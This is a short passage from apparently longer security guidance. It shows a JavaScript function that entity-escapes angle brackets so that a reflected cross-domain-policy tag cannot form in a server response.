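A minimal sketch of that escaping (the function name is illustrative):

function escapeAngleBrackets(s) {
    // Entity-escape < and > so a reflected <cross-domain-policy> tag
    // can never form in the response.
    return String(s).replace(/</g, "&lt;").replace(/>/g, "&gt;");
}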